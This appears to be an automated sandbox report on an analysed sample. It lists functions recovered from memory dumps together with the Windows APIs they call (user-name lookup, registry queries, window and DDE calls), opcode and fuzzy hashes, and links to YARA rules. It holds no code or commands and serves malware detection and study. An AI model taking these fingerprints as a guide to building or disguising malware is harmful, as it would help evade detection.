Opcode Fuzzy Hash: 6275062b0b7d5ce78514091d34750d7b60ddfc7be4401b7f1a87d634fa30042c
Instruction Fuzzy Hash: FDC10C34A11328CFCB69DF24D854AADB7BAFF48246F1041EAE40A93750CB759E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05A6CB34, Relevance: 7.8, APIs: 5, Instructions: 252COMMON

Download Yara Rule

APIs

_UserTestTokenForInteractive.USER32 ref: 05A6CCF2
GetInputState.USER32 ref: 05A6CE14
KiUserExceptionDispatcher.NTDLL ref: 05A6CEA8
DdeClientTransaction.USER32 ref: 05A6CF52
KiUserExceptionDispatcher.NTDLL ref: 05A6CF9C

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: User$DispatcherException$ClientInputInteractiveStateTestTokenTransaction
String ID:
API String ID: 2485976189-0
Opcode ID: 3dbcbcfb722ceb4b32d29ce0a1c20804da77482bbec649df0622b351be3d3b81
Instruction ID: dadab964236e9298c9c73cbd5f4406ca57554def8c936746098bbe79d5b65945
Opcode Fuzzy Hash: 3dbcbcfb722ceb4b32d29ce0a1c20804da77482bbec649df0622b351be3d3b81
Instruction Fuzzy Hash: B2C10C34A11328CFCB69DF24D854A9DB7BAFF48246F1085EAE40AA3750CB359E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05A6CB7B, Relevance: 7.7, APIs: 5, Instructions: 245COMMON

Download Yara Rule

APIs

_UserTestTokenForInteractive.USER32 ref: 05A6CCF2
GetInputState.USER32 ref: 05A6CE14
KiUserExceptionDispatcher.NTDLL ref: 05A6CEA8
DdeClientTransaction.USER32 ref: 05A6CF52
KiUserExceptionDispatcher.NTDLL ref: 05A6CF9C

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: User$DispatcherException$ClientInputInteractiveStateTestTokenTransaction
String ID:
API String ID: 2485976189-0
Opcode ID: f4776a6bedb2ed4eebe1b48c6a1f32604ebf0ca44f41f3cebda07ba043a6c46a
Instruction ID: dfc83c006d4e02461a3d7602c1ebe469f0804069c8f0d8bd3e444eb63adff24d
Opcode Fuzzy Hash: f4776a6bedb2ed4eebe1b48c6a1f32604ebf0ca44f41f3cebda07ba043a6c46a
Instruction Fuzzy Hash: F4B10B34A11328CFCB69DF24D854AADB7BABF48246F1045EAE40AA3750CB359E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05A6CBC2, Relevance: 7.7, APIs: 5, Instructions: 238COMMON

Download Yara Rule

APIs

_UserTestTokenForInteractive.USER32 ref: 05A6CCF2
GetInputState.USER32 ref: 05A6CE14
KiUserExceptionDispatcher.NTDLL ref: 05A6CEA8
DdeClientTransaction.USER32 ref: 05A6CF52
KiUserExceptionDispatcher.NTDLL ref: 05A6CF9C

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: User$DispatcherException$ClientInputInteractiveStateTestTokenTransaction
String ID:
API String ID: 2485976189-0
Opcode ID: 928f4932590585e40db96366a45417fbabe4ea36c89b82688b7ce5ba7efc8380
Instruction ID: fbe12a9e67bec4ba7b6d7b4193575d5de6701259d0feb7dd3e4ba7cb2a8f76c1
Opcode Fuzzy Hash: 928f4932590585e40db96366a45417fbabe4ea36c89b82688b7ce5ba7efc8380
Instruction Fuzzy Hash: D1B10B34A11328CFCB69DF24D854AADB7BABF48246F1045EAE40AA3750CB359E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05A6CC09, Relevance: 7.7, APIs: 5, Instructions: 229COMMON

Download Yara Rule

APIs

_UserTestTokenForInteractive.USER32 ref: 05A6CCF2
GetInputState.USER32 ref: 05A6CE14
KiUserExceptionDispatcher.NTDLL ref: 05A6CEA8
DdeClientTransaction.USER32 ref: 05A6CF52
KiUserExceptionDispatcher.NTDLL ref: 05A6CF9C

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: User$DispatcherException$ClientInputInteractiveStateTestTokenTransaction
String ID:
API String ID: 2485976189-0
Opcode ID: 9027be54e43ae1dd3f6f198a2c7be836ad319863cf23e85671b965d755252176
Instruction ID: f4babd85f60a23d18f207b348f2225574281d679d10f236aeb87898d4f4860cb
Opcode Fuzzy Hash: 9027be54e43ae1dd3f6f198a2c7be836ad319863cf23e85671b965d755252176
Instruction Fuzzy Hash: 96A10C34A11328CFCB69DF24D854A9DB7BAFF48246F1045EAE40A93750CB359E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05A6CC47, Relevance: 7.7, APIs: 5, Instructions: 224COMMON

Download Yara Rule

APIs

_UserTestTokenForInteractive.USER32 ref: 05A6CCF2
GetInputState.USER32 ref: 05A6CE14
KiUserExceptionDispatcher.NTDLL ref: 05A6CEA8
DdeClientTransaction.USER32 ref: 05A6CF52
KiUserExceptionDispatcher.NTDLL ref: 05A6CF9C

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: User$DispatcherException$ClientInputInteractiveStateTestTokenTransaction
String ID:
API String ID: 2485976189-0
Opcode ID: 23ce1491e4ab1569e1f426cc7b8c7609d0bbadba7a5222f02410b75776dbaa37
Instruction ID: ec75728402f64d2c7449163b082e1462704ad1b7fd5df1ec69c96f8f6ccf4646
Opcode Fuzzy Hash: 23ce1491e4ab1569e1f426cc7b8c7609d0bbadba7a5222f02410b75776dbaa37
Instruction Fuzzy Hash: CCA10B34A11328CFCB69DF34D854A9DB7BABF48246F1085EAE40AA3750CB359E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05A6CC8E, Relevance: 7.7, APIs: 5, Instructions: 215COMMON

Download Yara Rule

APIs

_UserTestTokenForInteractive.USER32 ref: 05A6CCF2
GetInputState.USER32 ref: 05A6CE14
KiUserExceptionDispatcher.NTDLL ref: 05A6CEA8
DdeClientTransaction.USER32 ref: 05A6CF52
KiUserExceptionDispatcher.NTDLL ref: 05A6CF9C

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: User$DispatcherException$ClientInputInteractiveStateTestTokenTransaction
String ID:
API String ID: 2485976189-0
Opcode ID: d5d299f6cb14231372e0d689102d1ce78e788850ae92c7eb5f547e9016a2d77e
Instruction ID: 423fd09399ef4c864e55b848712079803c3f46543eb10d483f9a713e0b9d35ad
Opcode Fuzzy Hash: d5d299f6cb14231372e0d689102d1ce78e788850ae92c7eb5f547e9016a2d77e
Instruction Fuzzy Hash: 9CA10C34A11328CFCB69DF24D854A9DB7BABF48246F1085EAE40A93750CF359E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05A6CCCC, Relevance: 7.7, APIs: 5, Instructions: 210COMMON

Download Yara Rule

APIs

_UserTestTokenForInteractive.USER32 ref: 05A6CCF2
GetInputState.USER32 ref: 05A6CE14
KiUserExceptionDispatcher.NTDLL ref: 05A6CEA8
DdeClientTransaction.USER32 ref: 05A6CF52
KiUserExceptionDispatcher.NTDLL ref: 05A6CF9C

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: User$DispatcherException$ClientInputInteractiveStateTestTokenTransaction
String ID:
API String ID: 2485976189-0
Opcode ID: 2c28758977cc816526b4d725adba09972a9f8734d08d2615f208abdc3365140c
Instruction ID: 36d135aeb4b9e62e05145a78220d9e5e35206096fbffadcc3fb6d13659969649
Opcode Fuzzy Hash: 2c28758977cc816526b4d725adba09972a9f8734d08d2615f208abdc3365140c
Instruction Fuzzy Hash: BD910B34A15328CFCB69DF24D854A9DB7BABF48246F1084EAE40AA3750CB359E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05A6CD13, Relevance: 6.2, APIs: 4, Instructions: 203COMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 05A6CE14
KiUserExceptionDispatcher.NTDLL ref: 05A6CEA8
DdeClientTransaction.USER32 ref: 05A6CF52
KiUserExceptionDispatcher.NTDLL ref: 05A6CF9C

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$ClientInputStateTransaction
String ID:
API String ID: 1341284055-0
Opcode ID: bbb57413274c7fcb6d69a7eac7de608eead05e317c250f6555423f53cec13b02
Instruction ID: 0bfdd790931efd2ba531904cc9436a1d78b13487355187c3d2872b817dedb5a8
Opcode Fuzzy Hash: bbb57413274c7fcb6d69a7eac7de608eead05e317c250f6555423f53cec13b02
Instruction Fuzzy Hash: 73910B34A10328CFCB69DB24D854A9DB7BABF48246F1085EAE40AA3750CB759E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05A6CD5A, Relevance: 6.2, APIs: 4, Instructions: 196COMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 05A6CE14
KiUserExceptionDispatcher.NTDLL ref: 05A6CEA8
DdeClientTransaction.USER32 ref: 05A6CF52
KiUserExceptionDispatcher.NTDLL ref: 05A6CF9C

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$ClientInputStateTransaction
String ID:
API String ID: 1341284055-0
Opcode ID: 99aa452da6bb577068cac2e850178381d98dd38ecc9df0786a96c017e5a69ae5
Instruction ID: a1b60e67ab09d5380209ee7b8db862aed24b2da51e12597c4d94b1beba675f89
Opcode Fuzzy Hash: 99aa452da6bb577068cac2e850178381d98dd38ecc9df0786a96c017e5a69ae5
Instruction Fuzzy Hash: 24911D34A10328CFCB69DF24D854A9DB7BABF48245F1085EAE40A93750CF759E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05A6CDA1, Relevance: 6.2, APIs: 4, Instructions: 189COMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 05A6CE14
KiUserExceptionDispatcher.NTDLL ref: 05A6CEA8
DdeClientTransaction.USER32 ref: 05A6CF52
KiUserExceptionDispatcher.NTDLL ref: 05A6CF9C

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$ClientInputStateTransaction
String ID:
API String ID: 1341284055-0
Opcode ID: f9118894b6f3252950e1e34b7d1aa3a6404e17aaf9d29837886fb57b6edefcc8
Instruction ID: 5e4efe451dfb6808e87acd66e8cfb075d085c0699b45919186e3cd3cd464e49d
Opcode Fuzzy Hash: f9118894b6f3252950e1e34b7d1aa3a6404e17aaf9d29837886fb57b6edefcc8
Instruction Fuzzy Hash: 69812B34A10328CFCB69DB24D854BADB7BABF48246F1084E9E40AA3750CF359E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05A6CDEB, Relevance: 6.2, APIs: 4, Instructions: 182COMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 05A6CE14
KiUserExceptionDispatcher.NTDLL ref: 05A6CEA8
DdeClientTransaction.USER32 ref: 05A6CF52
KiUserExceptionDispatcher.NTDLL ref: 05A6CF9C

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$ClientInputStateTransaction
String ID:
API String ID: 1341284055-0
Opcode ID: 917c2b4d3a7d8a8e0224c0f6813cf9bb1f73a0a66f17b020409cbf1341565f47
Instruction ID: 3f4b012c3f5699c472b12647c8fbe6801f286a97237cc1e73a2467ee4afff89f
Opcode Fuzzy Hash: 917c2b4d3a7d8a8e0224c0f6813cf9bb1f73a0a66f17b020409cbf1341565f47
Instruction Fuzzy Hash: 62810C34A143288FCB65DB24D858BADB7BABF48245F1084E9E80AA3750DF359E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 026D6904, Relevance: 6.1, APIs: 4, Instructions: 143threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 026D69A0
GetCurrentThread.KERNEL32 ref: 026D69DD
GetCurrentProcess.KERNEL32 ref: 026D6A1A
GetCurrentThreadId.KERNEL32 ref: 026D6A73

Memory Dump Source

Source File: 00000005.00000002.488793188.00000000026D0000.00000040.00000001.sdmp, Offset: 026D0000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: abb6946fca9656167a8c952207c8a0c680d0cb30c97cb2acda28c25f1b0c4148
Instruction ID: 0b47b4249097a19ce93f5dc4e29b270bc14adbffb01b45423f9581a5cbd61275
Opcode Fuzzy Hash: abb6946fca9656167a8c952207c8a0c680d0cb30c97cb2acda28c25f1b0c4148
Instruction Fuzzy Hash: D4517AB0D057898FDB11CFA9D648B9EBFF0EF49308F15809AD448AB361C7785849CB62

Uniqueness

Uniqueness Score: -1.00%

Function 026D6940, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 026D69A0
GetCurrentThread.KERNEL32 ref: 026D69DD
GetCurrentProcess.KERNEL32 ref: 026D6A1A
GetCurrentThreadId.KERNEL32 ref: 026D6A73

Memory Dump Source

Source File: 00000005.00000002.488793188.00000000026D0000.00000040.00000001.sdmp, Offset: 026D0000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 4268abcb8ae8c08c16f961da3943b40aaea60f7ab6c4f494244ecbffabd217b5
Instruction ID: 71aa9ec817b0bcb9fc0b497d0a23c1e2ce6c84a906b0188787565c37401a49bf
Opcode Fuzzy Hash: 4268abcb8ae8c08c16f961da3943b40aaea60f7ab6c4f494244ecbffabd217b5
Instruction Fuzzy Hash: 825134B0E006498FDB14CFA9D648B9EBBF5EF88318F248059E459A7350D774A984CF61

Uniqueness

Uniqueness Score: -1.00%

Function 05A6CE35, Relevance: 4.7, APIs: 3, Instructions: 175COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05A6CEA8
DdeClientTransaction.USER32 ref: 05A6CF52
KiUserExceptionDispatcher.NTDLL ref: 05A6CF9C

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$ClientTransaction
String ID:
API String ID: 2047309250-0
Opcode ID: 16722acf8f42db5c978a147f31db673d281a5ec2be3c8deea89e3bb156630924
Instruction ID: c9a0459dde7d144e9a61282aa6fbf93ec163866863a1e7c228bd0b61eac2768a
Opcode Fuzzy Hash: 16722acf8f42db5c978a147f31db673d281a5ec2be3c8deea89e3bb156630924
Instruction Fuzzy Hash: 65711D34A143288FCB65DF24D858BADB7BABF48245F1084E9E80AA3750DF359E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05A6CE7F, Relevance: 4.7, APIs: 3, Instructions: 168COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05A6CEA8
DdeClientTransaction.USER32 ref: 05A6CF52
KiUserExceptionDispatcher.NTDLL ref: 05A6CF9C

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$ClientTransaction
String ID:
API String ID: 2047309250-0
Opcode ID: c292ca4bb41051b80699114d5532dcdad2d9a2da8bacec325d8f7950fb8269c7
Instruction ID: 43fdcc138b03d121e9214e4960abc94ca0487ef3cd55ecaed5525c976c7d47e0
Opcode Fuzzy Hash: c292ca4bb41051b80699114d5532dcdad2d9a2da8bacec325d8f7950fb8269c7
Instruction Fuzzy Hash: 95711A34A143288FCB65DB24D858BADB7BABF48245F1084A9E80AA3750DF359E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05A6CEDF, Relevance: 3.2, APIs: 2, Instructions: 157COMMON

Download Yara Rule

APIs

DdeClientTransaction.USER32 ref: 05A6CF52
KiUserExceptionDispatcher.NTDLL ref: 05A6CF9C

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: ClientDispatcherExceptionTransactionUser
String ID:
API String ID: 176227849-0
Opcode ID: dd2814dbad1df9661de5581a1ad381710deb78a7d682cde0b4853538f9926a6b
Instruction ID: 317f1ad6fb932adea09ed0d08fd62aebe0ba4adaaace1a9fec6da8e9f1886ec3
Opcode Fuzzy Hash: dd2814dbad1df9661de5581a1ad381710deb78a7d682cde0b4853538f9926a6b
Instruction Fuzzy Hash: 23612B34A142288FCB65DB24DC58BADB7BABF48245F1084A9E80AE3750DF359E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05A6CF29, Relevance: 3.2, APIs: 2, Instructions: 150COMMON

Download Yara Rule

APIs

DdeClientTransaction.USER32 ref: 05A6CF52
KiUserExceptionDispatcher.NTDLL ref: 05A6CF9C

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: ClientDispatcherExceptionTransactionUser
String ID:
API String ID: 176227849-0
Opcode ID: 05b7e86f6c25ad8063f1a6f9ff8d8cb0162a74a4f1de0c1682edf7bd6fd4c683
Instruction ID: fe172d262384c9aab2a95385ec655f3ed0edfbcf6ebb802e234db4a625393a03
Opcode Fuzzy Hash: 05b7e86f6c25ad8063f1a6f9ff8d8cb0162a74a4f1de0c1682edf7bd6fd4c683
Instruction Fuzzy Hash: F2515D30A142288FCB65DB34DC58BADB7BABF48245F1484A9E80AE7750DF349E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05A6EA60, Relevance: 1.9, APIs: 1, Instructions: 415COMMON

Download Yara Rule

APIs

SetWindowLongPtrA.USER32(00000001,?,00000000,00000000,?,00000000), ref: 05A6ED20

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: c6eba7d50ec0787c59c3e0b38b0216a83cda9291e26d18542809ddfffdc174b7
Instruction ID: 8180c421c379fa1e8500a3b46d03171df254600b0c78f80d3adc5e04e0f9afce
Opcode Fuzzy Hash: c6eba7d50ec0787c59c3e0b38b0216a83cda9291e26d18542809ddfffdc174b7
Instruction Fuzzy Hash: B8E17138B002059FDB24DBA8D5A4BBEB7F6FB89310F148469E416EB390DB35DC458B91

Uniqueness

Uniqueness Score: -1.00%

Function 05A6EA50, Relevance: 1.8, APIs: 1, Instructions: 333COMMON

Download Yara Rule

APIs

SetWindowLongPtrA.USER32(00000001,?,00000000,00000000,?,00000000), ref: 05A6ED20

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 185b4c5cae3e2bd6f87209a7bf21ba177caf93a58c4db05c099b65c88f269c43
Instruction ID: 46b1c608643fef6b0b6edef017c36875f7b8a5a99a112b641634500b64d516df
Opcode Fuzzy Hash: 185b4c5cae3e2bd6f87209a7bf21ba177caf93a58c4db05c099b65c88f269c43
Instruction Fuzzy Hash: 50C14C78B001058FDB24DBA8D5A4BBEB7F6FB89310F158469E816EB390DB34DC458B91

Uniqueness

Uniqueness Score: -1.00%

Function 026D500F, Relevance: 1.7, APIs: 1, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.488793188.00000000026D0000.00000040.00000001.sdmp, Offset: 026D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a481301ca53a78d907cacbf85050c04ea081228e94a421fb93c5de6c6004757
Instruction ID: bdea025a0c43040c37aa3dd43ca7341e59b6102200d8ba54115b47c3594cc9af
Opcode Fuzzy Hash: 8a481301ca53a78d907cacbf85050c04ea081228e94a421fb93c5de6c6004757
Instruction Fuzzy Hash: 086132B1D04348AFDF11CFA9C884ADEBFB1BF49300F55815AE909AB221D7359845CF90

Uniqueness

Uniqueness Score: -1.00%

Function 05A6260A, Relevance: 1.7, APIs: 1, Instructions: 163COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,00000000), ref: 05A6B633

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 12eefb902e7d0df55ba66594643f3a3dc3b014d9a3533ada10ee15650cdc1c4a
Instruction ID: a94de7eec9e0bc91cf8da099867fb3e363fdbda06d548f92e9814af7de164e79
Opcode Fuzzy Hash: 12eefb902e7d0df55ba66594643f3a3dc3b014d9a3533ada10ee15650cdc1c4a
Instruction Fuzzy Hash: 9D616370E042588FDB14CFA9C898BDEBBB1FF49314F15802AE856EB391D7749845CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 05A6CF73, Relevance: 1.6, APIs: 1, Instructions: 143COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05A6CF9C

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 61c496876a41795dc00d4512addb6edbc8209f7f0ac1d33f81cdd397867df144
Instruction ID: cf77c925caad2b4d25484fb41af278eed182ef81a1d5e36b511599942a9b7d23
Opcode Fuzzy Hash: 61c496876a41795dc00d4512addb6edbc8209f7f0ac1d33f81cdd397867df144
Instruction Fuzzy Hash: 02515E30A142288FCB65DB34DC58BADB7BABF48245F1484A9E80AE3750DF349E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05A6B4ED, Relevance: 1.6, APIs: 1, Instructions: 134COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,00000000), ref: 05A6B633

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 0b06321e753da11a563a37954cf1dcc272e7b5c2feccb57f504eb68373f8e714
Instruction ID: 867338f068f50b17b04b9747133a7d9939e9cf7f9bd509fc472cfb415a6647d4
Opcode Fuzzy Hash: 0b06321e753da11a563a37954cf1dcc272e7b5c2feccb57f504eb68373f8e714
Instruction Fuzzy Hash: CF512374E002188FDB14CFA9C894BEDBBB1BF48314F158129E866BB391D7749845CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05A69ABC, Relevance: 1.6, APIs: 1, Instructions: 134COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,00000000), ref: 05A6B633

Memory Dump Source

Source File: 00000005.00000002.495768521.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: d47f499644aaea8f3c7e259e44943566d92da199b25bba007c4fbd9bbf34c057
Instruction ID: 2604108f3fe6321facd520a719a01082b0eb8bb3e33bcd8e496f6c7a4ac8c910
Opcode Fuzzy Hash: d47f499644aaea8f3c7e259e44943566d92da199b25bba007c4fbd9bbf34c057
Instruction Fuzzy Hash: A1511374E002188FDB14DFA9C988BEDBBB1BF48314F158129E826BB391D7749845CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A16B7A, Relevance: 1.6, APIs: 1, Instructions: 117registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 00A16C91

Memory Dump Source

Source File: 00000005.00000002.486275296.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: cd9f4e8de406fc97f4f55e2211f8e1bce121e2e0c58ec99559128c61953cd900
Instruction ID: d087a634e78f48137885378fe81cb85513f330a024215a97aa78df80d8cdd836
Opcode Fuzzy Hash: cd9f4e8de406fc97f4f55e2211f8e1bce121e2e0c58ec99559128c61953cd900
Instruction Fuzzy Hash: 87413471E052589FCB10CFA9C984ADEBFF1AF49304F15806AE859EB354D7749845CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 026D5084, Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 026D51A2

Memory Dump Source

Source File: 00000005.00000002.488793188.00000000026D0000.00000040.00000001.sdmp, Offset: 026D0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: bbcab600473550764a6263098d0bc4ef45aa4b1663b3e5e1ad2b022743ab4a9d
Instruction ID: b9bac15cdc352cd75fbfe4d88f8db3cabc846d1d6934c94207535339ff285950
Opcode Fuzzy Hash: bbcab600473550764a6263098d0bc4ef45aa4b1663b3e5e1ad2b022743ab4a9d
Instruction Fuzzy Hash: 8651EEB1D00309DFDB15CFA9C984ADEFBB1BF88314F64812AE819AB610D7749985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 026D5090, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 026D51A2

Memory Dump Source

Source File: 00000005.00000002.488793188.00000000026D0000.00000040.00000001.sdmp, Offset: 026D0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: c26c07065d7568fe0d527f22e708027183da577036687f22fecf8ce12b295f20
Instruction ID: 74728cfaef339a816b344deb5cfac64334fc2d3ade8b5ad2d2516c6f7c0d94d8
Opcode Fuzzy Hash: c26c07065d7568fe0d527f22e708027183da577036687f22fecf8ce12b295f20
Instruction Fuzzy Hash: 6D41BFB1D1034D9FDB14CF99C984ADEBBB5BF48314F64812AE819AB210D7749985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00A168C1, Relevance: 1.6, APIs: 1, Instructions: 109registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?), ref: 00A169D4

Memory Dump Source

Source File: 00000005.00000002.486275296.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: eb2a121a0001ace5c9ac08749a1f6de4a9022c28385150ff5dfee0e4918227ec
Instruction ID: 37f3985049685e40773c2c299c826fea7b56bd2bc17a39f0adcced11d4a9e93b
Opcode Fuzzy Hash: eb2a121a0001ace5c9ac08749a1f6de4a9022c28385150ff5dfee0e4918227ec
Instruction Fuzzy Hash: A64124B5E052899FDB10CFA8C548ADEFFF5AF49314F29C1AAD408AB241C7759885CB90

Uniqueness

Uniqueness Score: -1.00%

Function 026D7780, Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 026D7F01

Memory Dump Source

Source File: 00000005.00000002.488793188.00000000026D0000.00000040.00000001.sdmp, Offset: 026D0000, based on PE: false

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 8faccfb9d18944ae9a1883ea9c6a64d519858d3e75b63bd3403371ec204c4a77
Instruction ID: 85d54df6798f8217fb24cca1ed1bfce09835f550ead829c759b278a238f2236b
Opcode Fuzzy Hash: 8faccfb9d18944ae9a1883ea9c6a64d519858d3e75b63bd3403371ec204c4a77
Instruction Fuzzy Hash: 5A4126B5E002098FDB15CF99C488BAAFBF5FB88314F15C499E519AB321D734A841CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A16BD8, Relevance: 1.6, APIs: 1, Instructions: 85registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 00A16C91

Memory Dump Source

Source File: 00000005.00000002.486275296.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 891c3d5dd35086de588c9e2fe6bea9d381d0c32fcd02c572ec36c409de9c6520
Instruction ID: bcb6ea42ba95653aeab2ac32550df110fbb3b62f80cccb36334a59cfe46e5adf
Opcode Fuzzy Hash: 891c3d5dd35086de588c9e2fe6bea9d381d0c32fcd02c572ec36c409de9c6520
Instruction Fuzzy Hash: BB31BDB1D012589FCB20CF9AC984ADEBBF5FF48314F15802AE859AB310D7749945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A16920, Relevance: 1.6, APIs: 1, Instructions: 80registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?), ref: 00A169D4

Memory Dump Source

Source File: 00000005.00000002.486275296.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: d2b22b3c7c1c34c9ada4bede7c5fba4a12a5e8654b210b8c6b40c80dd6d33cea
Instruction ID: efc1e436f2e080be6c696cc73a4314de736caf26bb6e2357e2fd5e7a1b823bd9
Opcode Fuzzy Hash: d2b22b3c7c1c34c9ada4bede7c5fba4a12a5e8654b210b8c6b40c80dd6d33cea
Instruction Fuzzy Hash: 8F31DFB1D012499FDB10CF99C584ACEFFF5BF49314F29816AE809AB341C7759985CBA0

Uniqueness

Uniqueness Score: -1.00%

